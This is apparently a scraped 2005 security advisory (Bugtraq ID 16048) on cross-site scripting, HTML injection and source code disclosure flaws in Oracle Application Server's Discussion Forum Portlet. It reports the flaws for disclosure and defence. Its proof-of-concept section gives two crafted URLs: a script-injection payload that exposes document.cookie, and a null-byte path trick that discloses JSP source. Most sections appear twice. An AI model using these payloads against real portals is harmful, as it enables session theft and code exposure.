Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
BID:16048
Info
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
| Bugtraq ID: | 16048 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 23 2005 12:00AM |
| Updated: | Dec 23 2005 12:00AM |
| Credit: | Discovered by Johannes Greil, SEC Consult. |
| Vulnerable: |
Oracle Application Server Discussion Forum Portlet |
| Not Vulnerable: | |
Discussion
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities.
The following specific vulnerabilities were identified:
The application is prone to a cross-site scripting vulnerability.
Discussion Forum Portlet is also affected by multiple HTML injection vulnerabilities.
The application is vulnerable to a source code disclosure vulnerability as well.
All versions of Oracle Application Server Discussion Forum Portlet are considered to be vulnerable. It should be noted that Oracle Application Server Discussion Forum Portlet is not meant to be used in a production environment.
Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities.
The following specific vulnerabilities were identified:
The application is prone to a cross-site scripting vulnerability.
Discussion Forum Portlet is also affected by multiple HTML injection vulnerabilities.
The application is vulnerable to a source code disclosure vulnerability as well.
All versions of Oracle Application Server Discussion Forum Portlet are considered to be vulnerable. It should be noted that Oracle Application Server Discussion Forum Portlet is not meant to be used in a production environment.
Exploit / POC
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
Exploit code is not required.
The following proof of concept examples are available:
Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>
Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00
Exploit code is not required.
The following proof of concept examples are available:
Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>
Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00
Solution / Fix
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities
References:
References:
- OracleAS Discussion Forum Portlet (Oracle)